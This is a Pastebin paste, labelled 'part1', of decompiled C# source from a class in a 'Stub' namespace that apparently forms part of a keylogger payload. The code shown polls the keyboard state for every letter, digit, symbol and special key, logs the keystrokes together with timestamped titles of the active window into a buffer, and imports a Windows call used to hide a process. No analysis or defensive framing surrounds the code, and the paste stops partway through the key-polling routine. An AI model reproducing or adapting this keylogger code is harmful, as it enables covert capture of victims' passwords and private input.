Advertisement
Guest User

part1

a guest
Aug 13th, 2018
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Diagnostics;
  3. using System.Runtime.InteropServices;
  4. using System.Threading;
  5. using Microsoft.VisualBasic;
  6. using Microsoft.VisualBasic.CompilerServices;
  7. using My;
  8.  
  9. namespace Stub
  10. {
  11.     // Token: 0x02000010 RID: 16
  12.     public class A
  13.     {
  14.         // Token: 0x06000091 RID: 145 RVA: 0x0000E72F File Offset: 0x0000C92F
  15.         [DebuggerNonUserCode]
  16.         public A()
  17.         {
  18.         }
  19.  
  20.         // Token: 0x06000092 RID: 146 RVA: 0x0000E739 File Offset: 0x0000C939
  21.         public static void main_()
  22.         {
  23.             Fransesco.ko();
  24.         }
  25.  
  26.         // Token: 0x06000093 RID: 147 RVA: 0x0000E744 File Offset: 0x0000C944
  27.         public static string ACTvv()
  28.         {
  29.             string text = new string('\0', 100);
  30.             A.GetWindowTextA(A.GetForegroundWindow(), ref text, 100);
  31.             return text.Substring(0, checked(Strings.InStr(text, "\0", 0) - 1));
  32.         }
  33.  
  34.         // Token: 0x06000094 RID: 148 RVA: 0x0000E784 File Offset: 0x0000C984
  35.         public static bool CPOM()
  36.         {
  37.             return MyProject.Computer.Keyboard.CapsLock;
  38.         }
  39.  
  40.         // Token: 0x06000095 RID: 149
  41.         [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  42.         private static extern int GetAsyncKeyState(long vKey);
  43.  
  44.         // Token: 0x06000096 RID: 150
  45.         [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  46.         private static extern int GetForegroundWindow();
  47.  
  48.         // Token: 0x06000097 RID: 151 RVA: 0x0000E7A8 File Offset: 0x0000C9A8
  49.         public static string GetL()
  50.         {
  51.             return A.BRK;
  52.         }
  53.  
  54.         // Token: 0x06000098 RID: 152
  55.         [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  56.         private static extern int GetWindowTextA(int hwnd, [MarshalAs(34)] ref string lpString, int cch);
  57.  
  58.         // Token: 0x06000099 RID: 153 RVA: 0x0000E7C0 File Offset: 0x0000C9C0
  59.         [STAThread]
  60.         public static void main()
  61.         {
  62.             A.runx = true;
  63.             A.thx = new Thread(new ThreadStart(A.timx_run));
  64.             A.thx.Start();
  65.             A.runy = true;
  66.             A.thy = new Thread(new ThreadStart(A.timy_run));
  67.             A.thy.Start();
  68.             Fransesco.ko();
  69.         }
  70.  
  71.         // Token: 0x0600009A RID: 154
  72.         [DllImport("Kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  73.         private static extern int RegisterServiceProcess(int dwProcessId, int dwType);
  74.  
  75.         // Token: 0x0600009B RID: 155 RVA: 0x0000E824 File Offset: 0x0000CA24
  76.         public static void timx_run()
  77.         {
  78.             while (A.runx)
  79.             {
  80.                 Thread.Sleep(100);
  81.                 bool flag = Operators.CompareString(A.actv, A.ACTvv(), false) != 0 & Operators.CompareString(A.ACTvv(), "", false) != 0;
  82.                 if (flag)
  83.                 {
  84.                     A.actv = A.ACTvv();
  85.                     DateTime localTime = MyProject.Computer.Clock.LocalTime;
  86.                     A.BRK += string.Concat(new string[]
  87.                     {
  88.                         "\r\n\u0001",
  89.                         DateAndTime.Now.ToString("yy/MM/dd"),
  90.                         " | ",
  91.                         DateAndTime.TimeString,
  92.                         " - ",
  93.                         A.ACTvv(),
  94.                         "\u0001\r\n"
  95.                     });
  96.                 }
  97.             }
  98.         }
  99.  
  100.         // Token: 0x0600009C RID: 156 RVA: 0x0000E904 File Offset: 0x0000CB04
  101.         public static void timy_run()
  102.         {
  103.             while (A.runy)
  104.             {
  105.                 int asyncKeyState = A.GetAsyncKeyState(16L);
  106.                 int asyncKeyState2 = A.GetAsyncKeyState(65L);
  107.                 bool flag = (A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  108.                 if (flag)
  109.                 {
  110.                     A.BRK += "A";
  111.                 }
  112.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  113.                 if (flag)
  114.                 {
  115.                     A.BRK += "a";
  116.                 }
  117.                 asyncKeyState2 = A.GetAsyncKeyState(66L);
  118.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  119.                 if (flag)
  120.                 {
  121.                     A.BRK += "B";
  122.                 }
  123.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  124.                 if (flag)
  125.                 {
  126.                     A.BRK += "b";
  127.                 }
  128.                 asyncKeyState2 = A.GetAsyncKeyState(67L);
  129.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  130.                 if (flag)
  131.                 {
  132.                     A.BRK += "C";
  133.                 }
  134.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  135.                 if (flag)
  136.                 {
  137.                     A.BRK += "c";
  138.                 }
  139.                 asyncKeyState2 = A.GetAsyncKeyState(68L);
  140.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  141.                 if (flag)
  142.                 {
  143.                     A.BRK += "D";
  144.                 }
  145.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  146.                 if (flag)
  147.                 {
  148.                     A.BRK += "d";
  149.                 }
  150.                 asyncKeyState2 = A.GetAsyncKeyState(69L);
  151.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  152.                 if (flag)
  153.                 {
  154.                     A.BRK += "E";
  155.                 }
  156.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  157.                 if (flag)
  158.                 {
  159.                     A.BRK += "e";
  160.                 }
  161.                 asyncKeyState2 = A.GetAsyncKeyState(70L);
  162.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  163.                 if (flag)
  164.                 {
  165.                     A.BRK += "F";
  166.                 }
  167.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  168.                 if (flag)
  169.                 {
  170.                     A.BRK += "f";
  171.                 }
  172.                 asyncKeyState2 = A.GetAsyncKeyState(71L);
  173.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  174.                 if (flag)
  175.                 {
  176.                     A.BRK += "G";
  177.                 }
  178.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  179.                 if (flag)
  180.                 {
  181.                     A.BRK += "g";
  182.                 }
  183.                 asyncKeyState2 = A.GetAsyncKeyState(72L);
  184.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  185.                 if (flag)
  186.                 {
  187.                     A.BRK += "H";
  188.                 }
  189.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  190.                 if (flag)
  191.                 {
  192.                     A.BRK += "h";
  193.                 }
  194.                 asyncKeyState2 = A.GetAsyncKeyState(73L);
  195.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  196.                 if (flag)
  197.                 {
  198.                     A.BRK += "I";
  199.                 }
  200.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  201.                 if (flag)
  202.                 {
  203.                     A.BRK += "i";
  204.                 }
  205.                 asyncKeyState2 = A.GetAsyncKeyState(74L);
  206.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  207.                 if (flag)
  208.                 {
  209.                     A.BRK += "J";
  210.                 }
  211.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  212.                 if (flag)
  213.                 {
  214.                     A.BRK += "j";
  215.                 }
  216.                 asyncKeyState2 = A.GetAsyncKeyState(75L);
  217.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  218.                 if (flag)
  219.                 {
  220.                     A.BRK += "K";
  221.                 }
  222.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  223.                 if (flag)
  224.                 {
  225.                     A.BRK += "k";
  226.                 }
  227.                 asyncKeyState2 = A.GetAsyncKeyState(76L);
  228.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  229.                 if (flag)
  230.                 {
  231.                     A.BRK += "L";
  232.                 }
  233.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  234.                 if (flag)
  235.                 {
  236.                     A.BRK += "l";
  237.                 }
  238.                 asyncKeyState2 = A.GetAsyncKeyState(77L);
  239.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  240.                 if (flag)
  241.                 {
  242.                     A.BRK += "M";
  243.                 }
  244.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  245.                 if (flag)
  246.                 {
  247.                     A.BRK += "m";
  248.                 }
  249.                 asyncKeyState2 = A.GetAsyncKeyState(78L);
  250.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  251.                 if (flag)
  252.                 {
  253.                     A.BRK += "N";
  254.                 }
  255.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  256.                 if (flag)
  257.                 {
  258.                     A.BRK += "n";
  259.                 }
  260.                 asyncKeyState2 = A.GetAsyncKeyState(79L);
  261.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  262.                 if (flag)
  263.                 {
  264.                     A.BRK += "O";
  265.                 }
  266.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  267.                 if (flag)
  268.                 {
  269.                     A.BRK += "o";
  270.                 }
  271.                 asyncKeyState2 = A.GetAsyncKeyState(80L);
  272.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  273.                 if (flag)
  274.                 {
  275.                     A.BRK += "P";
  276.                 }
  277.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  278.                 if (flag)
  279.                 {
  280.                     A.BRK += "p";
  281.                 }
  282.                 asyncKeyState2 = A.GetAsyncKeyState(81L);
  283.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  284.                 if (flag)
  285.                 {
  286.                     A.BRK += "Q";
  287.                 }
  288.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  289.                 if (flag)
  290.                 {
  291.                     A.BRK += "q";
  292.                 }
  293.                 asyncKeyState2 = A.GetAsyncKeyState(82L);
  294.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  295.                 if (flag)
  296.                 {
  297.                     A.BRK += "R";
  298.                 }
  299.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  300.                 if (flag)
  301.                 {
  302.                     A.BRK += "r";
  303.                 }
  304.                 asyncKeyState2 = A.GetAsyncKeyState(83L);
  305.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  306.                 if (flag)
  307.                 {
  308.                     A.BRK += "S";
  309.                 }
  310.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  311.                 if (flag)
  312.                 {
  313.                     A.BRK += "s";
  314.                 }
  315.                 asyncKeyState2 = A.GetAsyncKeyState(84L);
  316.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  317.                 if (flag)
  318.                 {
  319.                     A.BRK += "T";
  320.                 }
  321.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  322.                 if (flag)
  323.                 {
  324.                     A.BRK += "t";
  325.                 }
  326.                 asyncKeyState2 = A.GetAsyncKeyState(85L);
  327.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  328.                 if (flag)
  329.                 {
  330.                     A.BRK += "U";
  331.                 }
  332.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  333.                 if (flag)
  334.                 {
  335.                     A.BRK += "u";
  336.                 }
  337.                 asyncKeyState2 = A.GetAsyncKeyState(86L);
  338.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  339.                 if (flag)
  340.                 {
  341.                     A.BRK += "V";
  342.                 }
  343.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  344.                 if (flag)
  345.                 {
  346.                     A.BRK += "v";
  347.                 }
  348.                 asyncKeyState2 = A.GetAsyncKeyState(87L);
  349.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  350.                 if (flag)
  351.                 {
  352.                     A.BRK += "W";
  353.                 }
  354.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  355.                 if (flag)
  356.                 {
  357.                     A.BRK += "w";
  358.                 }
  359.                 asyncKeyState2 = A.GetAsyncKeyState(88L);
  360.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  361.                 if (flag)
  362.                 {
  363.                     A.BRK += "X";
  364.                 }
  365.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  366.                 if (flag)
  367.                 {
  368.                     A.BRK += "x";
  369.                 }
  370.                 asyncKeyState2 = A.GetAsyncKeyState(89L);
  371.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  372.                 if (flag)
  373.                 {
  374.                     A.BRK += "Y";
  375.                 }
  376.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  377.                 if (flag)
  378.                 {
  379.                     A.BRK += "y";
  380.                 }
  381.                 asyncKeyState2 = A.GetAsyncKeyState(90L);
  382.                 flag = ((A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (!A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  383.                 if (flag)
  384.                 {
  385.                     A.BRK += "Z";
  386.                 }
  387.                 flag = ((!A.CPOM() & asyncKeyState == 0 & (asyncKeyState2 & 1) == 1) | (A.CPOM() & asyncKeyState != 0 & (asyncKeyState2 & 1) == 1));
  388.                 if (flag)
  389.                 {
  390.                     A.BRK += "z";
  391.                 }
  392.                 asyncKeyState2 = A.GetAsyncKeyState(49L);
  393.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  394.                 if (flag)
  395.                 {
  396.                     A.BRK += "1";
  397.                 }
  398.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  399.                 if (flag)
  400.                 {
  401.                     A.BRK += "!";
  402.                 }
  403.                 asyncKeyState2 = A.GetAsyncKeyState(50L);
  404.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  405.                 if (flag)
  406.                 {
  407.                     A.BRK += "2";
  408.                 }
  409.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  410.                 if (flag)
  411.                 {
  412.                     A.BRK += "@";
  413.                 }
  414.                 asyncKeyState2 = A.GetAsyncKeyState(51L);
  415.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  416.                 if (flag)
  417.                 {
  418.                     A.BRK += "3";
  419.                 }
  420.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  421.                 if (flag)
  422.                 {
  423.                     A.BRK += "#";
  424.                 }
  425.                 asyncKeyState2 = A.GetAsyncKeyState(52L);
  426.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  427.                 if (flag)
  428.                 {
  429.                     A.BRK += "4";
  430.                 }
  431.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  432.                 if (flag)
  433.                 {
  434.                     A.BRK += "$";
  435.                 }
  436.                 asyncKeyState2 = A.GetAsyncKeyState(53L);
  437.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  438.                 if (flag)
  439.                 {
  440.                     A.BRK += "5";
  441.                 }
  442.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  443.                 if (flag)
  444.                 {
  445.                     A.BRK += "%";
  446.                 }
  447.                 asyncKeyState2 = A.GetAsyncKeyState(54L);
  448.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  449.                 if (flag)
  450.                 {
  451.                     A.BRK += "6";
  452.                 }
  453.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  454.                 if (flag)
  455.                 {
  456.                     A.BRK += "^";
  457.                 }
  458.                 asyncKeyState2 = A.GetAsyncKeyState(55L);
  459.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  460.                 if (flag)
  461.                 {
  462.                     A.BRK += "7";
  463.                 }
  464.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  465.                 if (flag)
  466.                 {
  467.                     A.BRK += "&";
  468.                 }
  469.                 asyncKeyState2 = A.GetAsyncKeyState(56L);
  470.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  471.                 if (flag)
  472.                 {
  473.                     A.BRK += "8";
  474.                 }
  475.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  476.                 if (flag)
  477.                 {
  478.                     A.BRK += "*";
  479.                 }
  480.                 asyncKeyState2 = A.GetAsyncKeyState(57L);
  481.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  482.                 if (flag)
  483.                 {
  484.                     A.BRK += "9";
  485.                 }
  486.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  487.                 if (flag)
  488.                 {
  489.                     A.BRK += "(";
  490.                 }
  491.                 asyncKeyState2 = A.GetAsyncKeyState(48L);
  492.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  493.                 if (flag)
  494.                 {
  495.                     A.BRK += "0";
  496.                 }
  497.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  498.                 if (flag)
  499.                 {
  500.                     A.BRK += ")";
  501.                 }
  502.                 flag = ((A.GetAsyncKeyState(8L) & 1) == 1);
  503.                 if (flag)
  504.                 {
  505.                     A.BRK += "[Back]";
  506.                 }
  507.                 flag = ((A.GetAsyncKeyState(9L) & 1) == 1);
  508.                 if (flag)
  509.                 {
  510.                     A.BRK += "[tab]";
  511.                 }
  512.                 flag = ((A.GetAsyncKeyState(13L) & 1) == 1);
  513.                 if (flag)
  514.                 {
  515.                     A.BRK += "\r\n";
  516.                 }
  517.                 flag = ((A.GetAsyncKeyState(16L) & 1) == 1);
  518.                 if (flag)
  519.                 {
  520.                     A.BRK += "[shift]";
  521.                 }
  522.                 flag = ((A.GetAsyncKeyState(17L) & 1) == 1);
  523.                 if (flag)
  524.                 {
  525.                     A.BRK += "[ctrl]";
  526.                 }
  527.                 flag = ((A.GetAsyncKeyState(18L) & 1) == 1);
  528.                 if (flag)
  529.                 {
  530.                     A.BRK += "[alt]";
  531.                 }
  532.                 flag = ((A.GetAsyncKeyState(19L) & 1) == 1);
  533.                 if (flag)
  534.                 {
  535.                     A.BRK += "[pause]";
  536.                 }
  537.                 flag = ((A.GetAsyncKeyState(27L) & 1) == 1);
  538.                 if (flag)
  539.                 {
  540.                     A.BRK += "[esc]";
  541.                 }
  542.                 flag = ((A.GetAsyncKeyState(32L) & 1) == 1);
  543.                 if (flag)
  544.                 {
  545.                     A.BRK += " ";
  546.                 }
  547.                 flag = ((A.GetAsyncKeyState(35L) & 1) == 1);
  548.                 if (flag)
  549.                 {
  550.                     A.BRK += "[end]";
  551.                 }
  552.                 flag = ((A.GetAsyncKeyState(36L) & 1) == 1);
  553.                 if (flag)
  554.                 {
  555.                     A.BRK += "[home]";
  556.                 }
  557.                 flag = ((A.GetAsyncKeyState(37L) & 1) == 1);
  558.                 if (flag)
  559.                 {
  560.                     A.BRK += "[left]";
  561.                 }
  562.                 flag = ((A.GetAsyncKeyState(39L) & 1) == 1);
  563.                 if (flag)
  564.                 {
  565.                     A.BRK += "[right]";
  566.                 }
  567.                 flag = ((A.GetAsyncKeyState(38L) & 1) == 1);
  568.                 if (flag)
  569.                 {
  570.                     A.BRK += "[up]";
  571.                 }
  572.                 flag = ((A.GetAsyncKeyState(40L) & 1) == 1);
  573.                 if (flag)
  574.                 {
  575.                     A.BRK += "[down]";
  576.                 }
  577.                 flag = ((A.GetAsyncKeyState(45L) & 1) == 1);
  578.                 if (flag)
  579.                 {
  580.                     A.BRK += "[insert]";
  581.                 }
  582.                 flag = ((A.GetAsyncKeyState(46L) & 1) == 1);
  583.                 if (flag)
  584.                 {
  585.                     A.BRK += "[Delete]";
  586.                 }
  587.                 asyncKeyState2 = A.GetAsyncKeyState(186L);
  588.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  589.                 if (flag)
  590.                 {
  591.                     A.BRK += ";";
  592.                 }
  593.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  594.                 if (flag)
  595.                 {
  596.                     A.BRK += ":";
  597.                 }
  598.                 asyncKeyState2 = A.GetAsyncKeyState(187L);
  599.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  600.                 if (flag)
  601.                 {
  602.                     A.BRK += "=";
  603.                 }
  604.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  605.                 if (flag)
  606.                 {
  607.                     A.BRK += "+";
  608.                 }
  609.                 asyncKeyState2 = A.GetAsyncKeyState(188L);
  610.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  611.                 if (flag)
  612.                 {
  613.                     A.BRK += ",";
  614.                 }
  615.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  616.                 if (flag)
  617.                 {
  618.                     A.BRK += "<";
  619.                 }
  620.                 asyncKeyState2 = A.GetAsyncKeyState(189L);
  621.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  622.                 if (flag)
  623.                 {
  624.                     A.BRK += "-";
  625.                 }
  626.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  627.                 if (flag)
  628.                 {
  629.                     A.BRK += "_";
  630.                 }
  631.                 asyncKeyState2 = A.GetAsyncKeyState(190L);
  632.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  633.                 if (flag)
  634.                 {
  635.                     A.BRK += ".";
  636.                 }
  637.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  638.                 if (flag)
  639.                 {
  640.                     A.BRK += ">";
  641.                 }
  642.                 asyncKeyState2 = A.GetAsyncKeyState(191L);
  643.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  644.                 if (flag)
  645.                 {
  646.                     A.BRK += "/";
  647.                 }
  648.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  649.                 if (flag)
  650.                 {
  651.                     A.BRK += "?";
  652.                 }
  653.                 asyncKeyState2 = A.GetAsyncKeyState(192L);
  654.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  655.                 if (flag)
  656.                 {
  657.                     A.BRK += "`";
  658.                 }
  659.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  660.                 if (flag)
  661.                 {
  662.                     A.BRK += "~";
  663.                 }
  664.                 asyncKeyState2 = A.GetAsyncKeyState(219L);
  665.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  666.                 if (flag)
  667.                 {
  668.                     A.BRK += "";
  669.                 }
  670.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  671.                 if (flag)
  672.                 {
  673.                     A.BRK += "";
  674.                 }
  675.                 asyncKeyState2 = A.GetAsyncKeyState(220L);
  676.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  677.                 if (flag)
  678.                 {
  679.                     A.BRK += "\\";
  680.                 }
  681.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  682.                 if (flag)
  683.                 {
  684.                     A.BRK += "|";
  685.                 }
  686.                 asyncKeyState2 = A.GetAsyncKeyState(221L);
  687.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  688.                 if (flag)
  689.                 {
  690.                     A.BRK += "";
  691.                 }
  692.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  693.                 if (flag)
  694.                 {
  695.                     A.BRK += "";
  696.                 }
  697.                 asyncKeyState2 = A.GetAsyncKeyState(222L);
  698.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  699.                 if (flag)
  700.                 {
  701.                     A.BRK += "'";
  702.                 }
  703.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  704.                 if (flag)
  705.                 {
  706.                     A.BRK += "\"";
  707.                 }
  708.                 flag = ((A.GetAsyncKeyState(106L) & 1) == 1);
  709.                 if (flag)
  710.                 {
  711.                     A.BRK += "*";
  712.                 }
  713.                 flag = ((A.GetAsyncKeyState(111L) & 1) == 1);
